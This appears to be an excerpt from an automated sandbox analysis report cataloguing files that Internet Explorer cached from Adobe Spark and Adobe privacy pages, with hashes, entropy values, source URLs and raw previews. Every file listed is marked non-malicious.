                                                                                                                                                                                                                                                        Preview: RIFF....WEBPVP8 .........*,...>u8.I$.".#......in.q,...........1~k... =S=..^?.d.}..w.....~B......^........]......_b.......'.O..'....P/.?..x.....n.}........=.k.....w......'.O.....~C}..!......................?.........C......._.?..4.A.......?....9.......o..........H....E$ rb+.j` ....;':p.y.uL.V...<q&...n.1.....-..WV......6_;H..c_.<...;.0....rp.X....'....,.P....M..n..gr..X.>f..N.....66...Z..z.....T....v..SGL........:\..v....EX..a.-c......T...S..d.`..C.....GO..........S......... ..&7R<.g..x....>.Z.%.Z.(.#+...".v...-,...D..=.....zf.o...0)/.........Ld.OQ...@7X.:.:.G..B=C......2f..V...#.W>.....C...P.W.7O...b...~.p...e.l...B..J..L.."n2......i.-.e.7..E.7.0..T9?./m....d- ..\W.....o.k.xh.)[~9v.Y..:...Z`&.v....Y...W.....}.o..)....bW.......>.+#..X....(..".x.E.....chZ..u.GR.ZV.Y....ja.uC..@.......q.S1..x.....b...D....._..._!...}..b....A<...'..4$.;S.....B.JUG.....O....M......#.(.H...H...-.t..Z!..U.0......L..v.../Z..r..<..S..!e.+c..,.N.r.....Fv..F.$p.V....D....v....
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\media_1e13cbc31404e8b28464e9b87cd8a6537e45b579d[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):10730
                                                                                                                                                                                                                                                        Entropy (8bit):7.979522682402237
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:xj8sHk6ii6qNk8+spzbLa27iidstJO9fzANJO9MO83s4Qf0NLX5CUvS0tzK2uHu:xjTHkpiggtC2uSstJqfzAdjoCtLS0tV
                                                                                                                                                                                                                                                        MD5:2E13C36813551BA9A53B95EBE85D23B6
                                                                                                                                                                                                                                                        SHA1:A17AD1BE00D473D2107ED041360423BABC7BDBDC
                                                                                                                                                                                                                                                        SHA-256:368A81B50ED78494D7CE5A31D84CF6F648F14042016A20478F8B872E3D277D64
                                                                                                                                                                                                                                                        SHA-512:52A057CCB45B9068094AE4F95E431445439145576D94FFE4AA884B157ED8E77182A04EADA29B642E529EA2929C57F32D7396F14EDA31E9EB3A321AFD01CE1D0F
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_1e13cbc31404e8b28464e9b87cd8a6537e45b579d.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF.)..WEBPVP8 .).......*..k.>u6.H$."!%t<`...in.|.q....\....._..............(.....).........B{#.'......6.)..............?..|.b.Q.3.w..`/V~o......"..?......_.~............'.?.?....>....................G...7.......?A........?...?....I....?...t....&.....mG'...r{.mG'.s.....'X..;....%I.r.....|+A.|Bf..../R....:....~..&WM.v......g....9..j&.......\W..3b.RRs..".rt.F$/..o.x..\....e...k..Xj...}7..<2......h..L?L.NZ.n..>.C...oG.......`lA.........'......%1^OO.M..-..x.!.H..W5....^.....s....d)gcuo......u....Q.q..c.(..."@...0.P.....Z.r.k.....]..=.9.y1.....q.i%4#..|...#.....\.G..<...]N.....b.o..\.m...'Z.........>....VR...K.Yt=}a/..h../<R...|!......O..Yo.....0=...#......?.>....A.].yo.;..Z/.......a..l".1..=#=3.......Q....Lm D.F5+...Z.(H,[Y+cw.J....`.|F.-...L.Q..S:..[.Z+..0....[.g.\`..!.A.k,...M..`...H...w.%..O'....5.7...h.|..5)S.+...l.Vw..I.....&......<.p.{.b....b..0... .0.K...N....^R.L.M...Q?...b.pl.......!*.#.^...)A.....km..8..P*.e<.....p?.~..s.....q.t....
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\media_1f454cd3a74b3ab1dfcc2a270adb56667aa8edfa7[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):8704
                                                                                                                                                                                                                                                        Entropy (8bit):7.976105390553898
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:wTbDz0119PC5nEaK+n9c8g4Vuw8Zeh4mB5gXgyvWcuvNxHF:wbDg110kmvHws63ONpF
                                                                                                                                                                                                                                                        MD5:FCE89816C225B6C691848AABAA217E2F
                                                                                                                                                                                                                                                        SHA1:F4C7F2B1A1680D83739B2A31B9DF463BD4B4C25F
                                                                                                                                                                                                                                                        SHA-256:CAD3707C9E7E0753223DC9DC427C74413F94906E1DAF5731A271626A579B2A8F
                                                                                                                                                                                                                                                        SHA-512:B92F1EC32588048CAB4FED9B69193781B736E258AE1F469D149C072E8B4C11DE6F74DEC6C707C0848849C4C5CCADA7C21F89FE87C2DB477CC2DFD79BE61C2F08
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_1f454cd3a74b3ab1dfcc2a270adb56667aa8edfa7.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF.!..WEBPVP8 .!.......*,...>u4.I$...#2.....in.|...P..?..............5...?+.b2o......3.o...~m.|.c.....C.#.].....O...?...{..Wb.....................A...............O......7.G.../....?......D.'.........;...o....?.?........S.......o_......h....<...%..jU.Qbk.\2}y...cGg..BZ......R#..{r.w.'..kv.].&=.2.... .)Q....b....k.y.6h.08..yP.F......M....\...v.x&..,.R....Y..Yt8d.v....J....d>n.....L..R<...r@.*..W..de..J.P...c...s.@.I..{.2.T...0.......*..:...$S./i.".......V........]w..1+......{.a..2}y......*.B.F...y.=...q_.?.,..4.v....B&kq9....}.Zg35^v..eh.m.v..7...J...h.=aMNAr..X.._.....I...:..R...^...s.7pZ....'#..8..[...7#G.B.ISf.G......r....e.....tlaN[.M.=5.R...g.0.zL1OCeh.......]B.sR.r.).!Xu..\.V.n\....HY.>......]e#..........r,.1D.8."..l.Q..P..j.Gd.....a.YR9.tx..+7p..Yte<UQ..0.mv....>.*M.g.../.j...np.-[..xt=...Z..S..+..-.>.O3.&....).<.#1hw.pc.U....'..L-9..B.`.....S....7.q..r.P.{.. !`R...k.}.. .>?Y...k..e.u-..9.~oBc.81.|v.1.a....x..e.u-}..Si1.U+..^...p|...b:!
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\media_1fbe27ceda148e90b1a869766a19fbf743b5d9f9b[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):9288
                                                                                                                                                                                                                                                        Entropy (8bit):7.977477954803882
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:D0bYpz9ZAeKQejGdmYevJxTFCV52Q9DqMxiQreeIcPdOa6w9kSEnS7:D0bG9VBdmxLFCV5N9DqMxl1PEv4kSEne
                                                                                                                                                                                                                                                        MD5:6908028CE513CF5D88FD2BF5EA6E7D0B
                                                                                                                                                                                                                                                        SHA1:2BD65F8E03099133B745E75849AF230D2F78BADB
                                                                                                                                                                                                                                                        SHA-256:315800580F91BF51FC7B674FF02A0981668EE6B9363EB119BC274479D32B6135
                                                                                                                                                                                                                                                        SHA-512:33FB2FD13929501132BF00D932C17CC13631AFA484E8A9BEC1F284BF5FCCA1A11954C3A194AA1F6C8A66F475AC0EA490734BC09F42DF91D906508E086A021108
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_1fbe27ceda148e90b1a869766a19fbf743b5d9f9b.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF@$..WEBPVP8 4$.......*..k.>u6.H....#.....gn.. ....:V..|...._@.`...`..?e}@~........w.g.......+.........#...g.?..@......}._.Y3w...q~.........D{..#......@_n~....w...<..[.o....?........U...7..*._{..i................&.Jn4...Z.I.zM.Do..`.q?Tw...Z....l..PS.....Fs.>..*.M...e..o..Y.a.n.....@.RQ..=.. 'em..L...6|.[...'...P.i..6_.....$.../...p,:..`.. .$eV.r.-.......8W.Z.....Bp...J.W....E3.@g....N.|..w.........^.#....ImF....'..+...i.1s...i.Z....2.uf|...2.M......*...BI..]a.......L.+...Z..d^|<.KF.K.....V.R...7|...,.zU2.....&.\v.\...pi...M.....68]K*0wL...(..>....K.v..J.....c.;....'.D..8.=..6...T..X.....c[..viw..l.....t.......cO........e.$.+K....zq5..R.l.=nF~...Z...4..........4WS>....*.....d8&...J_..l.....=.............iR..N..R..T.- p7. ...Qn....^...f...R....3.....D.......m}....."l.S..$........5?K..M...3X.)0X.Y...y....r.)*.....P~_..V.@wdg4.^e.,..........A.. ...7.......s.z.R....%.....}..zC7....<.,W.^..J..w$.'....7.Y$..>...UO.w..tP.I.9.:.Gb.4
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\p[1].gif
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):35
                                                                                                                                                                                                                                                        Entropy (8bit):2.9302005337813077
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:CUHaaatrllH5:aB
                                                                                                                                                                                                                                                        MD5:81144D75B3E69E9AA2FA3E9D83A64D03
                                                                                                                                                                                                                                                        SHA1:F0FBC60B50EDF5B2A0B76E0AA0537B76BF346FFC
                                                                                                                                                                                                                                                        SHA-256:9B9265C69A5CC295D1AB0D04E0273B3677DB1A6216CE2CCF4EFC8C277ED84B39
                                                                                                                                                                                                                                                        SHA-512:2D073E10AE40FDE434EB31CBEDD581A35CD763E51FB7048B88CAA5F949B1E6105E37A228C235BC8976E8DB58ED22149CFCCF83B40CE93A28390566A28975744A
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://p.typekit.net/p.gif?s=1&k=rbi5aua&ht=tk&h=spark.adobe.com&f=171.172.173.174.175.176.5474.5475.146&a=1655249&js=1.20.0&app=typekit&e=js&_=1623433250281
                                                                                                                                                                                                                                                        Preview: GIF89a.............,..............;
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\premium-badge[1].svg
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):1837
                                                                                                                                                                                                                                                        Entropy (8bit):5.1777333267678225
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:+pRkHukAKUH+NBtlCxy3L/wLXnKv00ZLiSx8oR/ujUeG33:+6eMtMxy3LoLX30JiSiT4X
                                                                                                                                                                                                                                                        MD5:AC213C9AED6D9F97497F5F3E58B862DF
                                                                                                                                                                                                                                                        SHA1:3695F283B1194AE0E52576C5E4E37BFA1162F377
                                                                                                                                                                                                                                                        SHA-256:12B7C826926477E07EF2BE4939FFE5978DBC55F7414E84202DCE3595A75BCE0A
                                                                                                                                                                                                                                                        SHA-512:8E018BEEFC9A7FB0C240E3EC51DE2C0EF5922A9502A313DB6E8B3843C3B6EB0B065051FCDE867FC5795621EA6AE63F644407C5ECDFECD3309AF7152A79C18EB8
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://spark.adobe.com/images/premium-badge.svg
                                                                                                                                                                                                                                                        Preview: <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="20" height="27" viewBox="0 0 20 27">. <defs>. <linearGradient id="linear-gradient" x2="1" y2="1.047" gradientUnits="objectBoundingBox">. <stop offset="0" stop-color="#ffda00"/>. <stop offset="1" stop-color="#f4b300"/>. </linearGradient>. <filter id="Path_9843" x="0" y="0.501" width="20" height="26.499" filterUnits="userSpaceOnUse">. <feOffset dy="2" input="SourceAlpha"/>. <feGaussianBlur stdDeviation="0.5" result="blur"/>. <feFlood flood-opacity="0.161"/>. <feComposite operator="in" in2="blur"/>. <feComposite in="SourceGraphic"/>. </filter>. </defs>. <g id="Premium_Badge" data-name="Premium Badge" transform="translate(10456.998 8614.002)">. <g transform="matrix(1, 0, 0, 1, -10457, -8614)" filter="url(#Path_9843)">. <path id="Path_9843-2" data-name="Path 9843" d="M-347.421,1088.683l5.286,1.684a2,2,0,0,0,1.214,0l5.286-1.684a2,2,0,0,1,1.787.29
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\privacy[1].htm
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):83289
                                                                                                                                                                                                                                                        Entropy (8bit):4.5282510095356265
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:a4vVFWtdTiNl6mANPnaLjReghz8lti0iLeUkUC/6nHvYSECF+:aO7Wil6xneRPz8lfeeUkL/evREC0
                                                                                                                                                                                                                                                        MD5:7BE072D70770F73DC60E6E09A405ACF7
                                                                                                                                                                                                                                                        SHA1:7932FD89B02EC701EB0ABA30E95EFE8A28065CA6
                                                                                                                                                                                                                                                        SHA-256:6EA10BA72716954B9DF2ED0A4C99CC5BEC0BB1B7CF933FE63B4BF3D743D0C1CE
                                                                                                                                                                                                                                                        SHA-512:74157843DB81FDD5E04F9C61FE5A4A99501A7310F98F0F8E4D1763491CB8F938CFFE9E0507BF61D2549348777EA16F11677090D63372CD9B952638337DF6833D
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/privacy.html
                                                                                                                                                                                                                                                        Preview: .<!DOCTYPE HTML>.<html class="spectrum--medium" lang="en">. <head>. <title>Adobe Privacy Center</title>. <link rel="canonical" href="https://www.adobe.com/privacy.html"/>. .. . . . <link rel="alternate" hreflang="en-IE" href="https://www.adobe.com/ie/privacy.html"/>. . <link rel="alternate" hreflang="de" href="https://www.adobe.com/de/privacy.html"/>. . <link rel="alternate" hreflang="uk-UA" href="https://www.adobe.com/ua/privacy.html"/>. . <link rel="alternate" hreflang="ar-kw" href="https://www.adobe.com/mena_ar/privacy.html"/>. . <link rel="alternate" hreflang="en-us" href="https://www.adobe.com/privacy.html"/>. . <link rel="alternate" hreflang="lv-LV" href="https://www.adobe.com/lv/privacy.html"/>. . <link rel="alternate" hreflang="en-IL" href="https://www.adobe.com/il_en/privacy.html"/>. . <link rel="alternate" hrefla
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\rbi5aua[1].js
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):19114
                                                                                                                                                                                                                                                        Entropy (8bit):5.570400661578598
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:KefQe2tpIgIPs51iRm2lIew42noFeFsP9btiCtpIaCR:NQMq1iRm2XwMqsbbt6J
                                                                                                                                                                                                                                                        MD5:D464D0A61D4E34F4C431CA31D0F7E6E8
                                                                                                                                                                                                                                                        SHA1:73716727BFD77BA586E907A9FFC33FFC39CA73BF
                                                                                                                                                                                                                                                        SHA-256:29B51B31FAF8A954EC0209189E1A6491AFE94CBE50D1E16679FBA7561AD2BC5C
                                                                                                                                                                                                                                                        SHA-512:9B6FB7EBF94F0B42242A335B72B0C6A43DA7071B6AE9715FF70F96D54A4CA157D16A6F11B7D4C3573053E96DE06DD30791AB655BD55EEB5F3FB68989C3CB8B6D
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: /*. * The Typekit service used to deliver this font or fonts for use on websites. * is provided by Adobe and is subject to these Terms of Use. * http://www.adobe.com/products/eulas/tou_typekit. For font license. * information, see the list below.. *. * proxima-nova:. * - http://typekit.com/eulas/0000000000000000000158d3. * - http://typekit.com/eulas/0000000000000000000158d4. * - http://typekit.com/eulas/000000000000000000017709. * - http://typekit.com/eulas/0000000000000000000158d6. * - http://typekit.com/eulas/0000000000000000000158d7. * - http://typekit.com/eulas/0000000000000000000158d8. * - http://typekit.com/eulas/0000000000000000000158d9. * - http://typekit.com/eulas/00000000000000000001705b. * proxima-nova-condensed:. * - http://typekit.com/eulas/00000000000000000000ffd9. *. * . 2009-2021 Adobe Systems Incorporated. All Rights Reserved.. */.if(!window.Typekit)window.Typekit={};window.Typekit.config={"a":"1655249","c":[".tk-proxima-nova","\"proxima-nova\",sans-
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\sparkfavicon_v2[1].ico
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):4286
                                                                                                                                                                                                                                                        Entropy (8bit):2.2437058322637595
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:suZgizzxxEKfLOQQEsmcpG3xbWT//zvUUUUUUUUUUUUUUUUUUUUUUNl:HgizzxxEKzOQBbcpS5WT//zVl
                                                                                                                                                                                                                                                        MD5:79FBE30FC79A42EAA8A32DC344959E0E
                                                                                                                                                                                                                                                        SHA1:09AC6EE75F9686BAD2003926C5FA8DB80777E981
                                                                                                                                                                                                                                                        SHA-256:01F2FA23190A55B0B5F9DF0E0B66E23D136B7701BA3CC9A71FDAEDD409D92345
                                                                                                                                                                                                                                                        SHA-512:FFCED953A2A53C1370FECE0E366D7AC304ACFFAE6E44F571BD2EFED6E225149647F64704332160AFA8DCD6C946B3AAAA6A80C5BD6900612F56687DC35ED5EB24
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://spark.adobe.com/images/sparkfavicon_v2.ico
                                                                                                                                                                                                                                                        Preview: ...... .... .........(... ...@..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................70..7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...70..............................7`..7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7`......................70..7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...70..................7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...7...................7...7...7...7...7...7...7...7...
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\unsupported[1].htm
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):60948
                                                                                                                                                                                                                                                        Entropy (8bit):3.7860898349354586
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:4Q12kZaWG3USpc9w0OIJ80c/7nL/7dFs1HuChJ0GG9d:4+2kZTLSpc9n8RDD7UMd
                                                                                                                                                                                                                                                        MD5:E5CBCA1797F47CB380B655C22AC3797F
                                                                                                                                                                                                                                                        SHA1:EF32CCDC4917B675428E738E0766C533700E5C5A
                                                                                                                                                                                                                                                        SHA-256:184A779A82844FEDFE0A06ADFA4A2DA912AC740A64F15B17A3A02F9EF8972EBF
                                                                                                                                                                                                                                                        SHA-512:C250781C74350AA3971F23BE4EE5F1CF954220ECF6684584DE1B6002BAC4E2840105DB31D97370EC199DB78DE19B536BC929B71DD309895E14938DA70F9BA334
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://spark.adobe.com/unsupported
                                                                                                                                                                                                                                                        Preview: <!DOCTYPE html>.<html lang="en-US">. <head>. <title>Adobe Spark</title>. <meta http-equiv="content-type" content="text/html; charset=utf-8" />. <meta name="viewport" content="width=device-width,shrink-to-fit=no,initial-scale=1.0">..<link rel="shortcut icon" href="/images/sparkfavicon_v2.ico">.. <link rel="stylesheet" type="text/css" href="&#x2F;marvel-core&#x2F;css&#x2F;marvel-ui-faf07216.css">. <link rel="stylesheet" type="text/css" href="&#x2F;css&#x2F;marvel-landing-unsupported-ec51f18c.css">.<link rel="canonical" href="https://spark.adobe.com/unsupported">.<link rel="alternate" hreflang="en" href="https://spark.adobe.com/unsupported" />.<link rel="alternate" hreflang="cy" href="https://spark.adobe.com/cy-GB/unsupported" />.<link rel="alternate" hreflang="de" href="https://spark.adobe.com/de-DE/unsupported" />.<link rel="alternate" hreflang="fr" href="https://spark.adobe.com/fr-FR/unsupported" />.<link rel="alternate" hreflang="es" href="https:/
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\7a5eb705-95ed-4cc4-a11d-0cc5760e93db[1].js
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):3852
                                                                                                                                                                                                                                                        Entropy (8bit):4.632512639848438
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:OyIY40FtdRYzYValJ5GHZa6AyAYJjojVjht4S:iwKzYslJF6vAYJQdoS
                                                                                                                                                                                                                                                        MD5:526B16D51BF2FE4666A13EC61ECD9C72
                                                                                                                                                                                                                                                        SHA1:DC53861E92C2891C0138E64DB9F7AA6B3F8D2AA5
                                                                                                                                                                                                                                                        SHA-256:717CDB76535A04A9DEC6F2F6773475BE9574AE304CBA44F7E1A56CB26037D85C
                                                                                                                                                                                                                                                        SHA-512:4FF4D28F5755B27E847A6AC756ED0B958BE75378CCD563FAFD54CD888BFC8D1B4C94C1E2C4C78C1B2EC5FAF46052D02B3003CF446C10D1650715E4119126E6A0
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://cdn.cookielaw.org/consent/7a5eb705-95ed-4cc4-a11d-0cc5760e93db/7a5eb705-95ed-4cc4-a11d-0cc5760e93db.json
                                                                                                                                                                                                                                                        Preview: {"CookieSPAEnabled":false,"MultiVariantTestingEnabled":false,"UseV2":true,"MobileSDK":false,"SkipGeolocation":false,"ScriptType":"PRODUCTION","Version":"6.9.0","OptanonDataJSON":"7a5eb705-95ed-4cc4-a11d-0cc5760e93db","GeolocationUrl":"https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location","RuleSet":[{"Id":"8fc5213e-cec6-4fca-a134-aec9029b0675","Name":"Adobe_EEU_Canada","Countries":["de","no","fi","be","pt","bg","dk","lt","lu","lv","hr","fr","hu","se","si","mc","sk","mf","sm","yt","gb","ie","ca","gf","ee","mq","mt","gp","is","gr","it","es","at","re","cy","cz","ax","pl","ro","li","nl"],"States":{},"LanguageSwitcherPlaceholder":{"no":"no","de":"de","ru":"ru","fi":"fi","pt":"pt","bg":"bg","lt":"lt","lv":"lv","fr":"fr","hu":"hu","zh-Hans":"zh-Hans","default":"en","zh-Hant":"zh-Hant","uk":"uk","sk":"sk","sl":"sl","sv":"sv","ko":"ko","zh-TW":"zh-TW","zh-HK":"zh-HK","pt-BR":"pt-BR","it":"it","es":"es","zh":"zh","et":"et","cs":"cs","ar":"ar","ja":"ja","pl":"pl","ro":"ro","he":"he","
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\LawEnforcement_72px_lt-gray[1].svg
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):28018
                                                                                                                                                                                                                                                        Entropy (8bit):6.123287231997608
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:3B3bnD+0T1bo4s83RvlSqEOSt1uRgzgd6Hio:I0Bo49h32I6HT
                                                                                                                                                                                                                                                        MD5:203D2596591DD98304B03BDBCFE7948A
                                                                                                                                                                                                                                                        SHA1:145A9AB021FA39848CBF9E95DB7132554469934C
                                                                                                                                                                                                                                                        SHA-256:F0F7F1BB8276F731235B5519886DEF7081CE2AF2A906567888F5CC1F7BBD78C1
                                                                                                                                                                                                                                                        SHA-512:2A36BE5EF21D35EA123BE7CFDB88BC1C025AE359E80068E9E1FAB66748E15D268A7A9162CA0FE5364F34852E5EBA88DE665C5F5710668783ADC55A91D6825629
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/content/dam/cc1/en/privacy/images/LawEnforcement_72px_lt-gray.svg
                                                                                                                                                                                                                                                        Preview: <?xml version="1.0" encoding="utf-8"?>. Generator: Adobe Illustrator 19.2.0, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->.<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd" [..<!ENTITY ns_extend "http://ns.adobe.com/Extensibility/1.0/">..<!ENTITY ns_ai "http://ns.adobe.com/AdobeIllustrator/10.0/">..<!ENTITY ns_graphs "http://ns.adobe.com/Graphs/1.0/">..<!ENTITY ns_vars "http://ns.adobe.com/Variables/1.0/">..<!ENTITY ns_imrep "http://ns.adobe.com/ImageReplacement/1.0/">..<!ENTITY ns_sfw "http://ns.adobe.com/SaveForWeb/1.0/">..<!ENTITY ns_custom "http://ns.adobe.com/GenericCustomNamespace/1.0/">..<!ENTITY ns_adobe_xpath "http://ns.adobe.com/XPath/1.0/">.]>.<svg version="1.1" id="adobeNews_x5F_72_x5F_lt-ou" xmlns:x="&ns_extend;" xmlns:i="&ns_ai;" xmlns:graph="&ns_graphs;".. xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="72px" height="72px".. viewBox="-359 271 72 72" style="enab
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\Privacy-Image-1-1440x340.jpg.img[1].jpg
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, baseline, precision 8, 445x300, frames 3
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):39763
                                                                                                                                                                                                                                                        Entropy (8bit):7.739200940948953
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:5BYydlHQ1aBlM4zpnkAwb/+CQTku32yXKA+jYsarj4:5B5HS4VkARNwuvK7kd4
                                                                                                                                                                                                                                                        MD5:357C45BE36FA0CE8E2CD561773C30BDA
                                                                                                                                                                                                                                                        SHA1:1E8A908D9D14AAB718B48CF4CDD59267021ED235
                                                                                                                                                                                                                                                        SHA-256:FCB9BA715B4E111C01919EE7CF40128753FDBCE86DE4C68773AD951A15F5D78A
                                                                                                                                                                                                                                                        SHA-512:773B20DF99A75E7FD0B676D93B80ABFE76B2A7DE62AE460E84439E97F9B774A21AB22E531F5342F2CAF2A32B958922F3CE9E2075FCC0DACB8E5D9E1E837A92AC
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/content/dam/cc1/en/privacy/images/Privacy-Image-1-1440x340.jpg.img.jpg
